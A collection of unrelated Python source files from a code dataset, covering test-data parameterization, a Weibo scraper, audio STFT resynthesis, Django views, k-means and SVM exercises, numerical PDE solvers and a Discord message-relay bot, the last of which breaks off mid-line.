do_user_account = HandleYaml(USER_ACCOUNT_FILE_PATH)\n\n @classmethod\n def not_existed_replace(cls, data):\n do_mysql = HandleMysql()\n # 不存在手机号的参数化\n if cls.not_existed_tel_pattern in data: # 使用成员运算\n data = re.sub(cls.not_existed_tel_pattern, do_mysql.create_not_existed_mobile(), data)\n\n # 不存在的用户id替换\n if re.search(cls.not_existed_id_pattern, data):\n sql = \"SELECT id FROM member ORDER BY id DESC limit 0, 1;\"\n not_existed_id = do_mysql.run(sql).get('id') + 1 # 获取最 大的id加1\n data = re.sub(cls.not_existed_id_pattern, str(not_existed_id), data)\n\n # loan_id 替换\n if re.search(cls.loan_id_pattern, data):\n loan_id = getattr(cls, 'loan_id')\n data = re.sub(cls.loan_id_pattern, str(loan_id), data)\n do_mysql.close()\n return data\n\n @classmethod\n def invest_user_replace(cls, data):\n # 参数化投资人的id\n if re.search(cls.invest_user_id_pattern, data):\n invest_user_id = cls.do_user_account.read('invest', 'id')\n data = re.sub(cls.invest_user_id_pattern, str(invest_user_id), data)\n # 注册用户手机号的参数化\n if re.search(cls.invest_user_tel_pattern, data):\n invest_user_tel = cls.do_user_account.read('invest', 'mobile_phone')\n data = re.sub(cls.invest_user_tel_pattern, invest_user_tel, data)\n\n # 注册用户密码的参数化\n if re.search(cls.invest_user_pwd_pattern, data):\n invest_user_pwd = cls.do_user_account.read('invest', 'pwd')\n data = re.sub(cls.invest_user_tel_pattern, invest_user_pwd, data)\n return data\n\n @classmethod\n def borrow_user_replace(cls, data):\n return data\n # 借款人的相关替换\n\n @classmethod\n def admin_user_replace(cls, data):\n # 管理员相关的替换\n return data\n\n @classmethod\n def other_replace(cls, data):\n # 其他相关的替换\n return data\n\n @classmethod\n def to_param(cls, data):\n data = cls.not_existed_replace(data)\n data = cls.admin_user_replace(data)\n data = cls.borrow_user_replace(data)\n data = cls.other_replace(data)\n data = cls.invest_user_replace(data)\n return data\n\n\nif __name__ == '__main__':\n # 注册接口参数化\n one_str = {\"mobile_phone\": \"{not_existed_tel}\", \"pwd\": \"12345678\", \"type\": 1, \"reg_name\": \"keyou\"}\n print(Parameterize.to_param(one_str))\n","sub_path":"scripts/handle_parameterize_optimize.py","file_name":"handle_parameterize_optimize.py","file_ext":"py","file_size_in_byte":3457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"614133053","text":"class Employee:\r\n 'Employee class this for more information'\r\n\r\n def setName(self, name):\r\n 'sets the name in the object'\r\n self.name = name\r\n return\r\n \r\n def printname(self):\r\n 'prints the name from the object'\r\n print(self.name) \r\n return\r\n\r\ndef main():\r\n emp = Employee()\r\n emp1 = Employee()\r\n emp.setName('sdfsd')\r\n\r\n #Employee.setName(emp, 'asdas')\r\n #Employee.setName(emp1, 'asdas')\r\n\r\n #emp.setName('sdf')\r\n #print(emp.__dir__)\r\n #emp.setName('stalin')\r\n #emp.printname() __\r\n\r\n #print(type(emp))\r\n #print(dir(emp))\r\n\r\nmain()","sub_path":"OOPS/simpleClass.py","file_name":"simpleClass.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"180058841","text":"import requests\nimport json\nimport configparser\nimport time\nfrom bs4 import BeautifulSoup\n\n\ndef get_topic(_headers, _params):\n \"\"\"\nhttps://m.weibo.cn/container/getIndex\n :param _params:\"\"\n :param _url:\"https://m.weibo.cn/p/index?containerid=xxx&extparam=xxx&luicode=xxx&lfid=xxx\"\n :return:\n \"\"\"\n _page = dict()\n retry = 3\n _page[\"success\"] = False\n while retry > 0:\n resp = requests.get(\"https://m.weibo.cn/container/getIndex\", params=_params, headers=_headers)\n if resp.status_code == 200:\n break\n else:\n retry -= 1\n continue\n\n _page[\"status_code\"] = resp.status_code\n _page[\"reason\"] = resp.reason\n if resp.status_code != 200:\n return _page\n jss = json.loads(resp.content.decode(\"utf-8\"), \"utf-8\")\n\n if jss[\"ok\"] != 1:\n _page[\"success\"] = False\n print(\"get topic failed:\")\n print(\"detail message:\")\n print(jss)\n return _page\n _page[\"success\"] = True\n cards = jss[\"cards\"]\n\n _page[\"since_id\"] = jss[\"pageInfo\"][\"since_id\"]\n\n blogs = []\n _page[\"blogs\"] = blogs\n for card in cards:\n for it in card[\"card_group\"]:\n try:\n if it[\"card_type\"] == 9:\n mblog = it[\"mblog\"]\n blog = dict()\n blog[\"_id\"] = mblog[\"bid\"]\n blog[\"bid\"] = mblog[\"bid\"]\n blog[\"html_text\"] = mblog[\"text\"]\n blog[\"plain_text\"] = BeautifulSoup(mblog[\"text\"], \"html.parser\").get_text()\n user = dict(username=mblog[\"user\"][\"screen_name\"], uid=mblog[\"user\"][\"id\"])\n blog[\"user\"] = user\n blog[\"reposts_count\"] = mblog[\"reposts_count\"]\n blog[\"comments_count\"] = mblog[\"comments_count\"]\n blog[\"attitudes_count\"] = mblog[\"attitudes_count\"]\n blog[\"time\"] = mblog[\"created_at\"]\n blog[\"type\"] = -1\n blog[\"comments\"] = list()\n\n blog[\"load_info\"] = dict(load_comment=\"N\", load_time=time.time())\n blogs.append(blog)\n\n except KeyError as e:\n print(\"parse json item error:\")\n print(e)\n if len(_page[\"blogs\"]) == 0:\n _page[\"success\"] = False\n return _page\n","sub_path":"crawer_topic2.py","file_name":"crawer_topic2.py","file_ext":"py","file_size_in_byte":2350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"27256249","text":"# -*- coding: utf-8 -*-\nfrom scipy import arange, hamming, sin, pi\nfrom scipy.fftpack import fft, ifft\nfrom matplotlib import pylab as plt\n\nfrom scipy import signal\n\nimport scipy.io.wavfile\nimport numpy as np\n\nimport wave\n\ndef wavfilename_format(fname):\n import os.path\n file_name = fname\n name, ext = os.path.splitext(fname)\n if ext != '.wav':\n file_name = fname + '.wav'\n return file_name\n\ndef save_as_wav(resyn_sig, filename):\n # 2 ** 16 / 2\n # 32768.0\n # wavef=wavedata[1]*(1.0/32768.0) # pcm\n resyn_data = (resyn_sig * 32768.0).astype(np.int16)\n scipy.io.wavfile.write(filename, samplerate, resyn_data)\n\n# it seems to have something wrong 17-05-30 rild\n# solved: it was just because of two other instance ... つらい\n# ref: http://introcs.cs.princeton.edu/python/code/stdaudio.py.html\n# import array\ndef save_wav(resyn_sig, filename):\n # resyn_sig = (resyn_sig * 32768)\n\n resyn_sig = resyn_sig * float(0x7fff) # Why is this necessary? 06-01 rild\n # 0x7fff seems to mean 2 ** 16\n\n samples = np.array(resyn_sig, np.int16)\n\n filename = wavfilename_format(filename)\n w = wave.Wave_write(filename)\n w.setnchannels(1)\n w.setsampwidth(2) # 2 bytes\n w.setframerate(samplerate)\n w.setnframes(len(samples))\n w.setcomptype('NONE', 'descrip') # No compression\n\n w.writeframes(samples.tostring())\n w.close()\n\n\ndef save_spec(x, fs, new_filename='non'):\n # matplotlib.imshowではextentを指定して軸を決められます。aspect=\"auto\"で適切なサイズ比になります\n f, t, Sxx = signal.spectrogram(x, fs)\n plt.pcolormesh(t, f, Sxx)\n plt.xlabel(\"time[s]\")\n plt.ylabel(\"frequency[Hz]\")\n plt.colorbar()\n if new_filename != 'non':\n plt.savefig(new_filename)\n\noutput_files_path = \"out/\"\nfilename = \"res/hanekawa_nandemoha01.wav\"\n\ntag = \"stft\"\nscale = 'log' # 'normal', 'log'\npart = 'all' # or int val, less than t.shape (time steps)\nNFFT = 512 # scipy.signal.stft Defaults to 256.\n# 512 is likely to draw the best spectrogram\n# if making 'nperseg' bigger, Zxx.shape become (freqs:decrease, times:increase)\n# Zxx[0], freqs, about half of 'nperseg', rild 06-05\n\nimport pickle\n\ndef loader(filename):\n with open(filename, 'rb') as f:\n obj = pickle.load(f)\n return obj\n\nfname = 'hanekawa_nandemoha01'\n\nrpath = 'pkls/'\nt_filename = rpath + fname + '_t.pickle'\nf_filename = rpath + fname + '_f.pickle'\nZxxC_filename = rpath + 'generated' + 'ZxxC.pickle'\n\ndef stft_data_loader(ffile, tfile, Zxxfile):\n f = loader(ffile)\n t = loader(tfile)\n Zxx = loader(Zxxfile)\n return f, t, Zxx\n\nf, t, Zxx = stft_data_loader(f_filename,\n t_filename,\n ZxxC_filename)\nprint(f.shape)\nprint(t.shape)\nprint(Zxx.shape)\n\nsamplerate = 48000\n_, xrec = signal.istft(Zxx, samplerate)\n\n\nresyn_sig = xrec\nnew_filename = 'kmeans_center_gen'\nsave_wav(resyn_sig, output_files_path + new_filename + \".wav\")\n\nif part != 'all':\n _t = t[:part]\n _Zxx = Zxx[:, :part]\n plt.pcolormesh(_t, f, np.log(np.abs(_Zxx) ** 2)) # log scale\nelif scale == 'log':\n plt.pcolormesh(t, f, np.log(np.abs(Zxx) ** 2)) # log scale\nelif scale == 'normal':\n plt.pcolormesh(t, f, np.abs(Zxx), vmin=0, vmax=np.abs(Zxx).max()) # normal scale\n\nplt.title('STFT Magnitude')\nplt.ylabel('Frequency [Hz]')\nplt.xlabel('Time [sec]')\nplt.savefig(output_files_path + new_filename + \".png\")\n# plt.show()\n\n# save_spec(sig, samplerate, new_filename + \".png\")\nexit(0)\n\n'''\nrild's memo \n\n# Reference\n## scipy.signal.stft\nhttps://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.stft.html\n\n### code reading\nABST: It seems to be normal fft transform for me. \n\ndependence \nstft - _spectral_helper - _fft_helper\n \n#### _fft_helper memo \nwindowed fft: fft.pack (twosided) or np.fft.rfft (onesided) \nreturn freqs, time, result \n- 'freqs' seems to be difference phase proceduct from 'result'\n\n## scipy.signal.istft\nhttps://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.istft.html#scipy.signal.istft\n\n\n## plt.pcolormesh\n\nhttps://matplotlib.org/api/pyplot_api.html\nhttps://matplotlib.org/examples/pylab_examples/pcolor_demo.html\n\n## numpy array, get row column \nhttp://qiita.com/supersaiakujin/items/d63c73bb7b5aac43898a#%E5%88%97%E3%82%92%E6%8A%BD%E5%87%BA%E3%81%99%E3%82%8B \n\n---\n# Unused \n## scipy.signal.spectrogram\nhttps://docs.scipy.org/doc/scipy-0.19.0/reference/generated/scipy.signal.spectrogram.html\n'''\n\n","sub_path":"clustering/center_gen.py","file_name":"center_gen.py","file_ext":"py","file_size_in_byte":4468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"625748057","text":"from .apps import ditto_apps\nfrom ..flickr import app_settings\n\n\ndef ditto(request):\n # Get the name of the current page from the url conf.\n # So we can tell which page we're on in the templates.\n url_name = False\n if request.resolver_match:\n url_name = request.resolver_match.url_name\n\n return {\n 'url_name': url_name,\n 'enabled_apps': ditto_apps.enabled(),\n 'DITTO_FLICKR_USE_LOCAL_MEDIA':\n app_settings.DITTO_FLICKR_USE_LOCAL_MEDIA,\n }\n\n","sub_path":"ditto/core/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"323107449","text":"from django.shortcuts import render\n\n\ndef homepage(request):\n return render(request, 'homepage.html')\n\n\ndef count(request):\n mytext = request.GET['q']\n mytextlist = mytext.split()\n length = len(mytextlist)\n myworddict = {}\n for word in mytextlist:\n if word in myworddict:\n myworddict[word] += 1\n else:\n myworddict[word] = 1\n return render(request, 'count.html', {\"worddict\": myworddict.items(), \"length\": length})","sub_path":"wordcount/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"273047587","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : emmanuelgonzalez\nDate : 2020-01-29\nPurpose: Accepts exactly two positions and determines if vowel is present in the word. \n\"\"\"\n\nimport argparse\nimport os\nimport sys\n\n\n# --------------------------------------------------\ndef get_args():\n \"\"\"Get command-line arguments\"\"\"\n\n parser = argparse.ArgumentParser(\n description='Find position of vowel in string',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('vowel',\n metavar='vowel',\n help='A vowel to look for',\n choices=['a', 'e', 'i', 'o', 'u', 'A', 'E', 'I', 'O', 'U'])\n\n parser.add_argument('text',\n metavar='text',\n help='The text to search')\n \n return parser.parse_args()\n\n# --------------------------------------------------\ndef main():\n \"\"\"Make a jazz noise here\"\"\"\n\n args = get_args()\n vowel = args.vowel\n text = args.text \n vowels = \"aeiou\"\n \n if vowel.casefold() in text.casefold() and vowels: \n index = text.find(vowel)\n print(f'Found \"{vowel}\" in \"{text}\" at index {index}.')\n else:\n print(f'\"{vowel}\" is not found in \"{text}\".')\n\n# --------------------------------------------------\nif __name__ == '__main__':\n main()\n","sub_path":"assignments/01_strings/vpos.py","file_name":"vpos.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"322490659","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 9. naloga\n# Source:\n# https://towardsdatascience.com/understanding-k-means-clustering-in-machine-learning-6a6e67336aa1\n# https://scikit-learn.org/stable/auto_examples/cluster/plot_kmeans_digits.html#sphx-glr-auto-examples-cluster-plot-kmeans-digits-py\n\n\n# In[4]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import KMeans\nget_ipython().run_line_magic('matplotlib', 'inline')\n\ndata = pd.read_csv(\"data/clu/124.csv\") \n\ndata\nX = data.values\n\n\n# In[56]:\n\n\ncentroids = np.array([[44,5],[79,-38]])\ncentroids\n\n\n# In[57]:\n\n\nplt.scatter(X[ : , 0], X[ : , 1], c='b')\nplt.scatter(centroids[0][0], centroids[0][1], s=200, c='g', marker='s')\nplt.scatter(centroids[1][0], centroids[1][1], s=200, c='r', marker='s')\nplt.show()\n\n\n# In[50]:\n\n\nKmean = KMeans(n_clusters=2, max_iter=100, init=centroids, n_init=1)\nKmean.fit(data)\nKmean.cluster_centers_\n\n\n# In[48]:\n\n\nfirst = Kmean.cluster_centers_[0]\nsecond = Kmean.cluster_centers_[1]\nKmean.n_iter_\nfirst\nsecond\n\n\n# In[49]:\n\n\nplt.scatter(X[ : , 0], X[ : , 1], s =50, c='b')\nplt.scatter(first[0], first[1], s=200, c='g', marker='s')\nplt.scatter(second[0], second[1], s=200, c='r', marker='s')\nplt.show()\n\n\n# In[51]:\n\n\nKmean.labels_\n\n\n# In[53]:\n\n\nimport collections\ncollections.Counter(Kmean.labels_)\n\n\n# In[55]:\n\n\n# primer napovedovanja/klasifikacije točke\nsample_test=np.array([-3.0,-3.0])\nsecond_test=sample_test.reshape(1, -1)\nKmean.predict(second_test)\n\n","sub_path":"domace_naloge/dn02/postopkiPY/ninth.py","file_name":"ninth.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"610632081","text":"\"\"\"\nExample showing how to open a connection in demo mode.\n\"\"\"\n\n# this \"if\" statement is used so that Sphinx does not execute this script when the docs are being built\nif __name__ == '__main__':\n from msl.equipment import Config\n from msl.examples.equipment import EXAMPLES_DIR\n\n # load the database\n cfg = Config(EXAMPLES_DIR + '/example2.xml')\n dbase = cfg.database()\n\n # get a specific equipment record (a DMM from Agilent) from the database and\n # then connect to this DMM in demo mode to send some messages to it\n dmm_record = dbase.records(manufacturer='Agilent', serial=\"537179\")[0]\n dmm = dmm_record.connect(demo=True)\n print(dmm.query('*IDN?'))\n","sub_path":"msl/examples/equipment/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"207465557","text":"import sys\nimport numpy as np\nfrom mpi4py import MPI\n\nfrom pySDC.helpers.stats_helper import get_sorted\n\nfrom pySDC.implementations.controller_classes.controller_MPI import controller_MPI\nfrom pySDC.implementations.sweeper_classes.imex_1st_order import imex_1st_order\n\nfrom pySDC.playgrounds.pmesh.AllenCahn_PMESH_NEW import allencahn_imex, allencahn_imex_stab\nfrom pySDC.playgrounds.pmesh.TransferMesh_PMESH_NEW import pmesh_to_pmesh\nfrom pySDC.playgrounds.pmesh.AllenCahn_dump_NEW import dump\n\n\ndef run_simulation(name=''):\n \"\"\"\n A simple test program to do PFASST runs for the AC equation\n \"\"\"\n\n # set MPI communicator\n comm = MPI.COMM_WORLD\n\n world_rank = comm.Get_rank()\n world_size = comm.Get_size()\n\n # split world communicator to create space-communicators\n if len(sys.argv) >= 2:\n color = int(world_rank / int(sys.argv[1]))\n else:\n color = int(world_rank / 1)\n space_comm = comm.Split(color=color)\n # space_size = space_comm.Get_size()\n space_rank = space_comm.Get_rank()\n\n # split world communicator to create time-communicators\n if len(sys.argv) >= 2:\n color = int(world_rank % int(sys.argv[1]))\n else:\n color = int(world_rank / world_size)\n time_comm = comm.Split(color=color)\n # time_size = time_comm.Get_size()\n time_rank = time_comm.Get_rank()\n\n # print(\"IDs (world, space, time): %i / %i -- %i / %i -- %i / %i\" % (world_rank, world_size, space_rank,\n # space_size, time_rank, time_size))\n\n # initialize level parameters\n level_params = dict()\n level_params['restol'] = 1e-08\n level_params['dt'] = 1e-03\n level_params['nsweeps'] = [3, 1]\n\n # initialize sweeper parameters\n sweeper_params = dict()\n sweeper_params['quad_type'] = 'RADAU-RIGHT'\n sweeper_params['num_nodes'] = [3]\n sweeper_params['QI'] = ['LU'] # For the IMEX sweeper, the LU-trick can be activated for the implicit part\n sweeper_params['initial_guess'] = 'zero'\n\n # initialize problem parameters\n problem_params = dict()\n problem_params['nu'] = 2\n problem_params['L'] = 16.0\n problem_params['nvars'] = [(48 * 24, 48 * 24), (8 * 24, 8 * 24)]\n problem_params['eps'] = [0.04]\n problem_params['dw'] = [-0.04]\n problem_params['radius'] = 0.25\n problem_params['comm'] = space_comm\n problem_params['name'] = name\n problem_params['init_type'] = 'circle_rand'\n\n # initialize step parameters\n step_params = dict()\n step_params['maxiter'] = 50\n\n # initialize controller parameters\n controller_params = dict()\n controller_params['logger_level'] = 20 if space_rank == 0 else 99 # set level depending on rank\n # controller_params['hook_class'] = dump\n\n # fill description dictionary for easy step instantiation\n description = dict()\n description['problem_class'] = allencahn_imex\n # description['problem_class'] = allencahn_imex_stab\n description['problem_params'] = problem_params # pass problem parameters\n description['sweeper_class'] = imex_1st_order\n description['sweeper_params'] = sweeper_params # pass sweeper parameters\n description['level_params'] = level_params # pass level parameters\n description['step_params'] = step_params # pass step parameters\n description['space_transfer_class'] = pmesh_to_pmesh\n\n # set time parameters\n t0 = 0.0\n Tend = 1 * 0.001\n\n # instantiate controller\n controller = controller_MPI(controller_params=controller_params, description=description, comm=time_comm)\n\n # get initial values on finest level\n P = controller.S.levels[0].prob\n uinit = P.u_exact(t0)\n\n # call main function to get things done...\n uend, stats = controller.run(u0=uinit, t0=t0, Tend=Tend)\n\n if space_rank == 0:\n\n # filter statistics by type (number of iterations)\n iter_counts = get_sorted(stats, type='niter', sortby='time')\n\n print()\n\n niters = np.array([item[1] for item in iter_counts])\n out = f'Mean number of iterations on rank {time_rank}: {np.mean(niters):.4f}'\n print(out)\n\n timing = get_sorted(stats, type='timing_setup', sortby='time')\n out = f'Setup time on rank {time_rank}: {timing[0][1]:.4f} sec.'\n print(out)\n\n timing = get_sorted(stats, type='timing_run', sortby='time')\n out = f'Time to solution on rank {time_rank}: {timing[0][1]:.4f} sec.'\n print(out)\n\n\nif __name__ == \"__main__\":\n # name = 'AC-2D-application'\n name = 'AC-2D-application-forced'\n run_simulation(name=name)\n","sub_path":"pySDC/playgrounds/deprecated/pmesh/AC_2D_application_NEW.py","file_name":"AC_2D_application_NEW.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"550408489","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" résolution Schrödinger 1D par la méthode FDTD \"\"\"\n\n__author__ = \"Dominique Lefebvre\"\n__copyright__ = \"Copyright 2018 - TangenteX.com\"\n__version__ = \"1.0\"\n__date__ = \"12 septembre 2018\" \n__email__ = \"dominique.lefebvre@tangentex.com\"\n\n# importation des librairies\nfrom scipy import sin, cos, exp, zeros, pi, sqrt, arange\nfrom scipy.constants import h, hbar, e, m_e\nfrom scipy.integrate import simps\nfrom matplotlib.pyplot import figure,axis,plot,pause,show,ion,ioff,savefig,grid,xlabel,ylabel, title\n\n# définition des constantes - les constantes physiques standards sont\n# tirées du package scipy.constants\nDeuxPi = 2.0*pi\nL = 5.0e-9 # dimension de la boite quantique (USI) \n\n# définition du domaine spatial et temporel\nNx = 1001 # nombre de pas d'intégration sur le domaine spatial\nxmin = 0.0\nxmax = L\ndx = (xmax-xmin)/Nx\nx = arange(0.0,L,dx)\n\nNt = 15000 # nombre de pas d'intégration sur le domaine temporel\nPasAff = 1000\na2 = 0.1\ndt = a2*2*m_e*dx**2/hbar\na3 = e*dt/hbar\n\n# définition des paramètres du paquet d'onde inital\nx0 = x[Nx/4] # position initiale du paquet\nsigma = 2.0e-10 # largeur du paquet en m\nLambda = 1.5e-10 # longeur d'onde de de Broglie l'électron (en m)\nEc = (h/Lambda)**2/(2*m_e*e) # énergie cinétique théorique de l'électron (en eV)\n\n# définition du potentiel\nU = zeros(Nx) # particule libre dans le puit\n\n# initialisation des buffers de calcul aux conditions initiales\nPsi_Real = zeros(Nx)\nPsi_Imag = zeros(Nx)\nPsi_Prob = zeros(Nx)\n\n# calcul et affichage de la fonction d'onde initiale\nPsi_Real = exp(-0.5*((x-x0)/sigma)**2)*cos(DeuxPi*(x-x0)/Lambda)\nPsi_Imag = exp(-0.5*((x-x0)/sigma)**2)*sin(DeuxPi*(x-x0)/Lambda)\n# normalisation du paquet d'onde\nPsiPsiC = Psi_Real**2 + Psi_Imag**2\nC = simps(PsiPsiC,x)\nPsi_Real = Psi_Real/sqrt(C)\nPsi_Imag = Psi_Imag/sqrt(C)\nPsi_Prob = Psi_Real**2 + Psi_Imag**2\n\n# initialisation graphique\nion() # mode interactif\nfig = figure()\nymax = Psi_Real.max()\naxis([xmin*1.e9,xmax*1.e9,-ymax,ymax])\ngrid(True)\nxlabel('x [nanometre]', fontsize = 15)\nylabel('Amplitude de probabilite', fontsize = 15)\ntitle('Evolution', fontsize = 15)\n\n# tracé de la fonction d'onde initiale\nlinePsiR, = plot(x*1.e9,Psi_Real,'blue')\nlinePsiI, = plot(x*1.e9,Psi_Imag,'red') \nlinePsiP, = plot(x*1.e9,Psi_Prob/1.e5,'green')\n\n# boucle de calcul et d'affichage de l'évolution\nfor t in range(Nt):\n Psi_Real[1:-1] = Psi_Real[1:-1] - a2*(Psi_Imag[2:] - 2*Psi_Imag[1:-1] + Psi_Imag[:-2]) \\\n + a3*U[1:-1]*Psi_Imag[1:-1]\n Psi_Imag[1:-1] = Psi_Imag[1:-1] + a2*(Psi_Real[2:] - 2*Psi_Real[1:-1] + Psi_Real[:-2]) \\\n - a3*U[1:-1]*Psi_Real[1:-1]\n Psi_Prob[1:-1] = Psi_Real[1:-1]**2 + Psi_Imag[1:-1]**2\n if t % PasAff == 0: \n linePsiR.set_ydata(Psi_Real)\n linePsiI.set_ydata(Psi_Imag)\n linePsiP.set_ydata(Psi_Prob/1.e5)\n pause(0.2)\n\nprint('Fin de calcul')\nioff() # sortir du mode interactif\n\n \n","sub_path":"SchrodingerFDTD_1D.py","file_name":"SchrodingerFDTD_1D.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"583229688","text":"class Solution:\n\t# @param {integer} m\n\t# @param {integer} n\n\t# @return {integer}\n\tdef uniquePaths(self, m, n):\n\t\tif(m == 1 or n == 1):\n\t\t\treturn 1\n\t\telse:\n\t\t\td = [[1 for i in range(0, n)] for j in range(0, m)]\n\t\t\t''' 指数复杂度\n\t\t\treturn self.uniquePaths(m - Codeforces Round 352, n) + self.uniquePaths(m, n - Codeforces Round 352)\n\t\t\t'''\n\t\t\tfor i in range(1, m):\n\t\t\t\tfor j in range(1,n):\n\t\t\t\t\td[i][j] = d[i - 1][j] + d[i][j - 1]\n\n\t\t\treturn d[m - 1][n - 1]\n\ns = Solution()\nprint(s.uniquePaths(2, 3))","sub_path":"Python/062M_Unique_Paths.py","file_name":"062M_Unique_Paths.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"639953389","text":"#!/usr/bin/python\n\n\"\"\" \n This is the code to accompany the Lesson 2 (SVM) mini-project.\n\n Use a SVM to identify emails from the Enron corpus by their authors: \n Sara has label 0\n Chris has label 1\n\"\"\"\n \nimport sys\nfrom time import time\nsys.path.append(\"../tools/\")\nfrom email_preprocess import preprocess\n\n\n### features_train and features_test are the features for the training\n### and testing datasets, respectively\n### labels_train and labels_test are the corresponding item labels\nfeatures_train, features_test, labels_train, labels_test = preprocess()\n\n\n\n#########################################################\n### your code goes here ###\n\nfrom sklearn.svm import SVC\n#clf = SVC(kernel=\"linear\")\n\nC = 10000.0\nclf = SVC(kernel=\"rbf\", C=C)\n\nprint(\"C: \"+str(C))\n\n# train on only 1% of the data set\n#features_train = features_train[:len(features_train)/100]\n#labels_train = labels_train[:len(labels_train)/100]\n\nt0 = time()\nclf.fit(features_train, labels_train)\nprint(\"training time: \"+str(round(time()-t0, 3)))\n\n\nt0 = time()\npred = clf.predict(features_test)\nprint(\"testing time: \"+str(round(time()-t0, 3)))\n\nacc = clf.score(features_test, labels_test)\nprint(\"accuracy: \"+str(acc))\n#########################################################\n\ntotal = len(pred)\nchris = sum(pred)\nprint(\"out of \"+str(total)+\" test events, a sum of 1's gives us chris\")\nprint(\"chris = \"+str(chris))\nprint(\"sara = \"+str(total-chris))\n\n\na1 = pred[10]\nprint(\"10: \"+str(a1))\na2 = pred[26]\nprint(\"26: \"+str(a2))\na3 = pred[50]\nprint(\"50: \"+str(a3))\n","sub_path":"svm/svm_author_id.py","file_name":"svm_author_id.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"210432189","text":"import discord\nfrom discord.ext import commands\n\nbot = commands.Bot(command_prefix=\"$\")\n\n\nclass test_discord():\n relaying_channels = {\n 'test-1': 'test-2'\n }\n relaying_prefix = ''\n relaying_suffix = '<@&816054356091994164>'\n relaying_ignore_roles = {\n #816054356091994164\n }\n\n command_channels = {\n 'bot-commands',\n }\n command_always_accept_from_roles = {\n 816054356091994164\n }\n\n rp_active_role_name = 'epic role'\n rp_active_role_id = 816054356091994164\n\n\n@bot.event\nasync def on_ready():\n print('We have logged in as {0.user}'.format(bot))\n\n\ndef _validate_command(ctx: commands.Context) -> bool:\n if ctx.author == bot.user:\n return False\n\n if ctx.channel.name in guild_details.command_channels:\n return True\n\n for role in ctx.author.roles:\n if role.id in guild_details.command_always_accept_from_roles:\n return True\n\n return False\n\n\n@bot.command(\n name='ping',\n brief='Returns Pong. Used to check if the bot is up and running',\n help=('Returns Pong. If the bot does not respond, it means it is down or something terrible '\n 'has happened.'),\n)\nasync def ping(ctx: commands.Context):\n if not _validate_command(ctx):\n return\n\n await ctx.channel.send('Pong.')\n\n\n@bot.command(\n name='rpactive',\n brief='Changes your RP Active status',\n help=('If you did not have the RP Active role, the bot will give it to you. If you already had '\n 'it, the bot will take it away from you.'),\n)\nasync def rpactive(ctx: commands.Context):\n if not _validate_command(ctx):\n return\n\n rp_active_role = discord.utils.get(ctx.message.guild.roles,\n name=guild_details.rp_active_role_name)\n\n user = ctx.author\n has_rp_active = False\n\n for role in user.roles:\n if role.id == guild_details.rp_active_role_id:\n has_rp_active = True\n\n if has_rp_active:\n await user.remove_roles(rp_active_role)\n await ctx.send(f'Removed role **{guild_details.rp_active_role_name}**.')\n else:\n await user.add_roles(rp_active_role)\n await ctx.send(f'Added role **{guild_details.rp_active_role_name}**.')\n\n\n@bot.event\nasync def on_command_error(ctx, error):\n if isinstance(error, commands.CommandNotFound):\n # No need to do anything fancy here\n return\n raise error\n\n\n@bot.event\nasync def on_message(message):\n if message.author == bot.user:\n return\n\n if message.channel.name in guild_details.relaying_channels:\n await _relay_message(\n message,\n prefix=guild_details.relaying_prefix,\n suffix=guild_details.relaying_suffix)\n\n await bot.process_commands(message)\n\n\ndef get_channel(name):\n channel = discord.utils.get(bot.get_all_channels(), name=name)\n if not channel:\n raise ValueError(f'Target channel {name} not found.')\n return channel\n\n\nasync def _relay_message(message, prefix='', suffix=''):\n for role in message.author.roles:\n if role.id in guild_details.relaying_ignore_roles:\n return\n\n to_channel_name = guild_details.relaying_channels[message.channel.name]\n to_channel = get_channel(to_channel_name)\n relay_format = (\n '**RELAYED MESSAGE**\\r\\n'\n '**User**: {message.author.name}#{message.author.discriminator} (<@{message.author.id}>)\\r\\n'\n '**Channel**: <#{message.channel.id}>\\r\\n'\n '**Time**: {message.created_at}\\r\\n'\n '**Message**: {message.content}\\r\\n'\n )\n if prefix:\n relay_format = '{prefix}\\r\\n' + relay_format\n if suffix:\n relay_format += '{suffix}'\n\n final_message = relay_format.format(\n message=message,\n prefix=prefix,\n suffix=suffix,\n )\n\n await message.delete()\n await to_channel.send(final_message)\n\n\nif __name__ == '__main__':\n production = True # Change to True for use in public servers, False for test server\n if production:\n token_file = '.token'\n from DRO_Discord import DRO_discord\n guild_details = DRO_discord()\n else:\n token_file = 'test.token'\n guild_details = test_discord()\n print('THIS 